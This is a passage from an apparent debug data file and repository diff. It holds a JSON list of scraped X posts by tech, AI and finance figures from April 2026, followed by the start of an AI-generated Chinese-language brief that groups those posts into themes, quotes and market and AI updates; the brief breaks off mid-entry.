Marcus", "published_at": "2026-04-27T12:48:41+00:00", "title": "R to @GaryMarcus: Stop blaming the users. It’s not that simple:", "url": "https://x.com/GaryMarcus/status/2048746152749846549"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T12:40:59+00:00", "title": "RT by @elonmusk: 🚨 NEWS: Emirates upgrades its iconic A380 with Starlink high-speed Wi-Fi, delivering “better-than-home” internet at 40,000 feet.\n\n• Up to 3 Starlink antennas on each A380 for massive speed boost\n\n• Internet performance improved up to 1000x vs older systems\n\n• Ena", "url": "https://x.com/elonmusk/status/2048744214230712500"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T12:36:05+00:00", "title": "People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right.\n\nUsers *are*screwing up - by letting vibe coded stuff access their files, without proper backups, without proper monitoring, without adequate sysadmin, etc.\n\nBut that’s *exactl", "url": "https://x.com/GaryMarcus/status/2048742983684784239"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T12:20:17+00:00", "title": "“Vibe coded disasters piling up on Reddit”", "url": "https://x.com/GaryMarcus/status/2048739005525877072"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T11:35:33+00:00", "title": "RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. \n\nOpenAI doesn’t “benefit all of humanity.”", "url": "https://x.com/elonmusk/status/2048727747954868342"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T11:08:22+00:00", "title": "RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his private residence, censored him, gagged him, tried to bankrupt him, and attempted ", "url": "https://x.com/elonmusk/status/2048720909809156378"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-27T10:01:28+00:00", "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", "url": "https://x.com/paulg/status/2048704073356935676"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-27T09:50:40+00:00", "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", "url": "https://x.com/paulg/status/2048701354672050286"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-27T08:17:48+00:00", "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", "url": "https://x.com/paulg/status/2048677984106664227"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T08:14:21+00:00", "title": "😳", "url": "https://x.com/pmarca/status/2048677114480873657"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T08:07:29+00:00", "title": "cc @BrendanEich", "url": "https://x.com/pmarca/status/2048675385119019444"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T08:04:13+00:00", "title": "👀", "url": "https://x.com/pmarca/status/2048674564314685477"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T08:01:44+00:00", "title": "But \"A Disservice To Those Who Are Watching\" is the name of this show!", "url": "https://x.com/pmarca/status/2048673940072251670"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T07:59:56+00:00", "title": "cc @elonmusk", "url": "https://x.com/pmarca/status/2048673488383447437"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:43:41+00:00", "title": "When one thing becomes abundant and cheap, another thing becomes scarce and valuable.", "url": "https://x.com/pmarca/status/2048624098398650608"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:32:43+00:00", "title": "Overheard in Silicon Valley: \"Imagine if he heard how the world really worked. Wonder what manifesto would say then.\"", "url": "https://x.com/pmarca/status/2048621340408844368"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:29:26+00:00", "title": "Image", "url": "https://x.com/pmarca/status/2048620511912194339"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:10:44+00:00", "title": "The apps can rewrite the files. 👀", "url": "https://x.com/pmarca/status/2048615807190769738"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-27T04:08:42+00:00", "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. T", "url": "https://x.com/paulg/status/2048615296613937201"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:07:00+00:00", "title": "Many such cases.", "url": "https://x.com/pmarca/status/2048614869352714619"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:06:10+00:00", "title": "🇺🇸", "url": "https://x.com/pmarca/status/2048614659595583651"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:04:46+00:00", "title": "Many such cases (in the universe).", "url": "https://x.com/pmarca/status/2048614305705386433"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T03:56:11+00:00", "title": "Concerning.", "url": "https://x.com/pmarca/status/2048612144871264609"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T03:49:14+00:00", "title": "Self recommending!", "url": "https://x.com/pmarca/status/2048610397243265189"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T03:39:49+00:00", "title": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”.", "url": "https://x.com/GaryMarcus/status/2048608025464705084"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T03:11:45+00:00", "title": "Grok Imagine", "url": "https://x.com/elonmusk/status/2048600964102246438"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T03:01:18+00:00", "title": "Self recommending recommending.", "url": "https://x.com/pmarca/status/2048598334492033455"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T02:57:11+00:00", "title": "👀", "url": "https://x.com/pmarca/status/2048597298150875169"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T02:41:14+00:00", "title": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic princ", "url": "https://x.com/GaryMarcus/status/2048593283639894520"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T02:34:50+00:00", "title": "👀", "url": "https://x.com/pmarca/status/2048591674688037210"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T02:26:57+00:00", "title": "Curiosity & adventure are my philosophy\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a", "url": "https://x.com/elonmusk/status/2048589691054694406"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T02:25:10+00:00", "title": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can", "url": "https://x.com/GaryMarcus/status/2048589239915577837"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T02:25:08+00:00", "title": "Overheard in Silicon Valley: \"Did a Claw post this?\"", "url": "https://x.com/pmarca/status/2048589233095643240"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:59:04+00:00", "title": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory", "url": "https://x.com/GaryMarcus/status/2048582672163995766"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T01:51:02+00:00", "title": "Incredible writing from @euphoriaHBO", "url": "https://x.com/jason/status/2048580651985604783"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:48:56+00:00", "title": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?", "url": "https://x.com/GaryMarcus/status/2048580122521780676"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:44:47+00:00", "title": "RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.", "url": "https://x.com/GaryMarcus/status/2048579079121555764"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:40:43+00:00", "title": "the difference is that we don’t *hype* giving 12 year-olds bulldozers.\n\n*of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point.\n\nvibe coding without considerable experience is like driving without a license.", "url": "https://x.com/GaryMarcus/status/2048578055283880296"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T01:20:46+00:00", "title": "Overheard in Silicon Valley: \"Now, software is just the prompt for the next version of the software.\"", "url": "https://x.com/pmarca/status/2048573035616375134"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:09:02+00:00", "title": "RT by @GaryMarcus: Never ever use generative AI for anything critical. \n\nThe technology is probablistic all the way down and therefore inherently unreliable. \n\nWhy is this so hard to understand? \n\nIt’s wild how many seemingly smart people have drunk the cool aid on this.", "url": "https://x.com/GaryMarcus/status/2048570082843082905"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:00:07+00:00", "title": "Generative AI as the Hindenberg", "url": "https://x.com/GaryMarcus/status/2048567837221089669"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T00:25:00+00:00", "title": "Is it me or X starting to look like a vibe coded mess?\n\nPolls are broken.\n\nAccounts are getting hacked.\n\nMy DMs are full of phishing scams.\n\nBasics that used to work no longer work.", "url": "https://x.com/GaryMarcus/status/2048558998325166498"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-27T00:05:31+00:00", "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", "url": "https://x.com/sama/status/2048554097985593849"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T00:02:43+00:00", "title": "R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:", "url": "https://x.com/GaryMarcus/status/2048553390540734479"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T00:00:53+00:00", "title": "Total AI disaster, totally predictable", "url": "https://x.com/GaryMarcus/status/2048552931923013916"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-26T23:59:53+00:00", "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", "url": "https://x.com/sama/status/2048552677433643427"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-26T23:22:48+00:00", "title": "Remember this", "url": "https://x.com/elonmusk/status/2048543344746250466"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-26T22:50:49+00:00", "title": "Grad school indoctrination camps", "url": "https://x.com/elonmusk/status/2048535299102265720"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-26T22:34:46+00:00", "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", "url": "https://x.com/HarryStebbings/status/2048531257399664920"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-26T21:32:43+00:00", "title": "Many such cases.", "url": "https://x.com/pmarca/status/2048515643268567431"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-26T21:21:33+00:00", "title": "RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets.\n\nHe predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky.\n\nThe scary part: he retweeted every mainstream Democrat on this platform.\n\nThread below. 👇\n\nWhat ", "url": "https://x.com/elonmusk/status/2048512831692452091"}, {"handle": "DavidSacks", "name": "David Sacks", "published_at": "2026-04-26T20:42:24+00:00", "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", "url": "https://x.com/DavidSacks/status/2048502978626113625"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T19:42:30+00:00", "title": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTim", "url": "https://x.com/jason/status/2048487905543237675"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-26T19:35:39+00:00", "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers l", "url": "https://x.com/HarryStebbings/status/2048486182904852537"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T18:31:11+00:00", "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP admi", "url": "https://x.com/ylecun/status/2048469956627468510"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T18:14:04+00:00", "title": "Ok @Acosta, balls in your court", "url": "https://x.com/jason/status/2048465651723882972"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T18:05:09+00:00", "title": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad", "url": "https://x.com/jason/status/2048463405590225173"}, {"handle": "DavidSacks", "name": "David Sacks", "published_at": "2026-04-26T17:37:26+00:00", "title": "RT by @DavidSacks: Accurate", "url": "https://x.com/DavidSacks/status/2048456433981591867"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T17:27:23+00:00", "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency t", "url": "https://x.com/ylecun/status/2048453901930660058"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T17:13:01+00:00", "title": "Who made this?!", "url": "https://x.com/jason/status/2048450286902235560"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T16:21:34+00:00", "title": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds", "url": "https://x.com/jason/status/2048437340218044499"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T16:18:48+00:00", "title": "RT by @charliebilello: Does a government shutdown negatively impact the stock market?\n\nNo.\n\nThe S&P 500 has gained an average of 0.4% during prior shutdowns and is up 4.8% during the current shutdown which is the longest in history at 70 days and counting.\n\n$SPX", "url": "https://x.com/charliebilello/status/2048436641451155650"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T16:16:34+00:00", "title": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers", "url": "https://x.com/jason/status/2048436081725464959"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-26T16:14:38+00:00", "title": "RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.”\n\nAmong very conservative people it’s just 3%.\n\nIn other words, the far left is 8x more likely to support political violence as the far right.\n\nStop pretending this is a “both sides” p", "url": "https://x.com/elonmusk/status/2048435593244237849"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T16:03:04+00:00", "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\n", "url": "https://x.com/ylecun/status/2048432684930654430"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-26T15:46:41+00:00", "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", "url": "https://x.com/sama/status/2048428561481265539"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-26T15:37:00+00:00", "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", "url": "https://x.com/sama/status/2048426122854228141"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T15:10:21+00:00", "title": "RT by @charliebilello: The 12.5% gain in the S&P 500 over the last 4 weeks was the 20th biggest 4-week advance for the index since 1950. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", "url": "https://x.com/charliebilello/status/2048419415222259820"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-26T15:07:55+00:00", "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do", "url": "https://x.com/HarryStebbings/status/2048418806867870115"}, {"handle": "DavidSacks", "name": "David Sacks", "published_at": "2026-04-26T15:03:35+00:00", "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns", "url": "https://x.com/DavidSacks/status/2048417712439689346"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T14:48:06+00:00", "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", "url": "https://x.com/paulg/status/2048413815675539816"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T14:47:09+00:00", "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", "url": "https://x.com/paulg/status/2048413578789634100"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T14:40:28+00:00", "title": "Durer was the original Dr Seuss.", "url": "https://x.com/paulg/status/2048411898081583547"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T14:36:59+00:00", "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", "url": "https://x.com/paulg/status/2048411021329453562"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T14:19:13+00:00", "title": "RT by @charliebilello: The stock market is at an all-time high.\n\nCredit spreads are near all-time lows.\n\nAnd inflation has been above the Fed's target level for 61 consecutive months, averaging 4% per year since 2019.\n\nSo why is the Fed expanding its balance sheet (QE)?\n\nVideo: h", "url": "https://x.com/charliebilello/status/2048406550897729561"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T14:00:02+00:00", "title": "RT by @charliebilello: On March 30, the S&P 500 was down 7% in 2026, the 12th worst start to a year in history. After one of the biggest 4-week rallies ever, it's now up +5% YTD and above the average year at this point in time (+3%). There is no impossible in markets.\n\nVideo: htt", "url": "https://x.com/charliebilello/status/2048401720540061794"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-26T13:56:31+00:00", "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", "url": "https://x.com/HarryStebbings/status/2048400836024283246"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T13:51:54+00:00", "title": "RT by @Jason: Random pic of @Jason protecting our $TAO bags", "url": "https://x.com/jason/status/2048399674269213067"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T13:51:41+00:00", "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", "url": "https://x.com/ylecun/status/2048399621492236615"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T13:45:00+00:00", "title": "RT by @charliebilello: Global Inflation Rates are on the RISE...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s", "url": "https://x.com/charliebilello/status/2048397937156518387"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T13:37:21+00:00", "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", "url": "https://x.com/paulg/status/2048396013816152216"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T13:30:00+00:00", "title": "RT by @charliebilello: With the exception of Bitcoin, every major asset class is now in positive territory on the year...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", "url": "https://x.com/charliebilello/status/2048394162366533935"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T13:14:49+00:00", "title": "RT by @charliebilello: The S&P 500 ended the week at another all-time high, its 9th of the year. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", "url": "https://x.com/charliebilello/status/2048390341221404827"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T11:57:10+00:00", "title": "Good use of camouflage by Biscuit.", "url": "https://x.com/paulg/status/2048370801833828507"}, {"handle": "JeffDean", "name": "Jeff Dean", "published_at": "2026-04-26T10:41:25+00:00", "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in h", "url": "https://x.com/JeffDean/status/2048351736037826877"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T06:48:29+00:00", "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put a", "url": "https://x.com/ylecun/status/2048293118781296734"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T03:57:07+00:00", "title": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent me", "url": "https://x.com/jason/status/2048249992163242220"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T03:46:17+00:00", "title": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt the", "url": "https://x.com/jason/status/2048247267182658004"}] diff --git a/data/x_brief/debug/20260428_011513_l1_stage1_output.json b/data/x_brief/debug/20260428_011513_l1_stage1_output.json new file mode 100644 index 0000000..b43d9c4 --- /dev/null +++ b/data/x_brief/debug/20260428_011513_l1_stage1_output.json @@ -0,0 +1,220 @@ +{ + "raw_text": "\n\n{\"themes\":[{\"id\":\"t1\",\"title\":\"Sam Altman:重新思考操作系统和UI设计\",\"subtitle\":\" Altman暗示AI将改变人机交互范式\",\"bullets\":[\"微软仍是主要云伙伴,但OpenAI产品将可在所有云上使用\",\"认为现在是认真重新思考操作系统和用户界面设计的好时机\",\"提出应有一个人类和AI代理都能使用的协议\"],\"sample_urls\":[\"https://x.com/sama/status/2048428561481265539\",\"https://x.com/sama/status/2048755148361707946\"]},{\"id\":\"t2\",\"title\":\"AI-native工程团队的工作方式演进\",\"subtitle\":\"Andrew Ng深度分析AI编程带来的变化\",\"bullets\":[\"AI-native团队使用编码代理构建产品速度更快\",\"不仅改变开发速度,还改变了团队运营方式\",\"高质量工程师角色转变为更多监督和审查\"],\"sample_urls\":[\"https://x.com/AndrewYNg/status/2048793852702757151\"]},{\"id\":\"t3\",\"title\":\"宏观叙事:美股估值与央行政策\",\"subtitle\":\"Charlie Bilello警示市场信号\",\"bullets\":[\"S&P 500的CAPE比率升至41,创2000年以来最高,超过99%历史估值\",\"美联储扩张资产负债表(QE),但市场仍创新高\",\"2026年跟随2025剧本,交易员对极端言论免疫,更自信抄底\"],\"sample_urls\":[\"https://x.com/charliebilello/status/2048753179471323584\",\"https://x.com/charliebilello/status/2048761760971096534\"]}],\"p0_events\":[{\"id\":\"p01\",\"title\":\"OpenAI与微软更新合作\",\"meta\":\"2026-04-27 | @sama\",\"summary\":\"微软仍为主要云伙伴,OpenAI产品可跨所有云使用,合作延续至2032年\",\"url\":\"https://x.com/sama/status/2048755148361707946\"},{\"id\":\"p02\",\"title\":\"AI-native软件工程团队运作差异\",\"meta\":\"2026-04-27 | @AndrewYNg\",\"summary\":\"AI团队使用编码代理构建产品更快,运营方式发生根本变化\",\"url\":\"https://x.com/AndrewYNg/status/2048793852702757151\"},{\"id\":\"p03\",\"title\":\"S&P 500 CAPE比率创2000年来新高\",\"meta\":\"2026-04-27 | @charliebilello\",\"summary\":\"估值达41,超过99%历史水平,央行QE持续但市场无视风险\",\"url\":\"https://x.com/charliebilello/status/2048753179471323584\"},{\"id\":\"p04\",\"title\":\"GPT-5.5成为Perplexity默认编排模型\",\"meta\":\"2026-04-24 | @AravSrinivas\",\"summary\":\"用户消耗更少算力 credits,可运行更多任务\",\"url\":\"https://x.com/AravSrinivas/status/2047788775468908840\"},{\"id\":\"p05\",\"title\":\"Paul Graham:初创公司不必担心被模型公司吞噬\",\"meta\":\"2026-04-27 | @paulg\",\"summary\":\"担心被模型公司吃掉就像担心成为明星后生活受限\",\"url\":\"https://x.com/paulg/status/2048677984106664227\"},{\"id\":\"p06\",\"title\":\"Marc Andreessen:软件即提示\",\"meta\":\"2026-04-27 | @pmarca\",\"summary\":\"软件只是下一个版本软件的提示\",\"url\":\"https://x.com/pmarca/status/2048573035616375134\"}],\"top_quotes\":[{\"id\":\"q1\",\"quote\":\"feels like a good time to seriously rethink how operating systems and user interfaces are designed\",\"speaker\":\"Sam Altman\",\"date\":\"2026-04-26\",\"note\":\"暗示AI将重塑人机交互范式\",\"url\":\"https://x.com/sama/status/2048428561481265539\"},{\"id\":\"q2\",\"quote\":\"When one thing becomes abundant and cheap, another thing becomes scarce and valuable.\",\"speaker\":\"Marc Andreessen\",\"date\":\"2026-04-27\",\"note\":\"一句话道出AI时代的价值转移逻辑\",\"url\":\"https://x.com/pmarca/status/2048624098398650608\"},{\"id\":\"q3\",\"quote\":\"Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.\",\"speaker\":\"Paul Graham\",\"date\":\"2026-04-27\",\"note\":\"对AI焦虑的经典回应\",\"url\":\"https://x.com/paulg/status/2048677984106664227\"}],\"category_updates\":[{\"id\":\"c1\",\"title\":\"AI模型进展\",\"subtitle\":\"行业持续快速迭代\",\"level\":\"P0\",\"item_urls\":[\"https://x.com/sama/status/2048554097985593849\",\"https://x.com/AravSrinivas/status/2047753276888854595\"],\"item_texts\":[\"GPT-5.5发布反响热烈\",\"Perplexity默认模型切换至GPT-5.5\"]},{\"id\":\"c2\",\"title\":\"AI编程工具\",\"subtitle\":\"编码代理实战表现\",\"level\":\"P0\",\"item_urls\":[\"https://x.com/sama/status/2048165186482389253\",\"https://x.com/sama/status/2047386955550470245\"],\"item_texts\":[\"Codex在企业内部部署效果显著\",\"研究人员让GPT-5.5独立运行实验\"]},{\"id\":\"c3\",\"title\":\"宏观市场\",\"subtitle\":\"美股风险信号积累\",\"level\":\"P1\",\"item_urls\":[\"https://x.com/charliebilello/status/2048753179471323584\",\"https://x.com/charliebilello/status/2048406550897729561\"],\"item_texts\":[\"CAPE估值创25年新高\",\"通胀持续高于美联储目标61个月\"]},{\"id\":\"c4\",\"title\":\"AI安全与批评\",\"subtitle\":\"GaryMarcus持续警示\",\"level\":\"P2\",\"item_urls\":[\"https://x.com/GaryMarcus/status/2048757233174122827\",\"https://x.com/GaryMarcus/status/2048593283639894520\"],\"item_texts\":[\"AI代理是过早技术,推广太快\",\"vibe coding一代不懂备份\"]},{\"id\":\"c5\",\"title\":\"VC视角\",\"subtitle\":\"行业方向判断\",\"level\":\"P1\",\"item_urls\":[\"https://x.com/paulg/status/2048677984106664227\",\"https://x.com/pmarca/status/2048624098398650608\"],\"item_texts\":[\"Paul 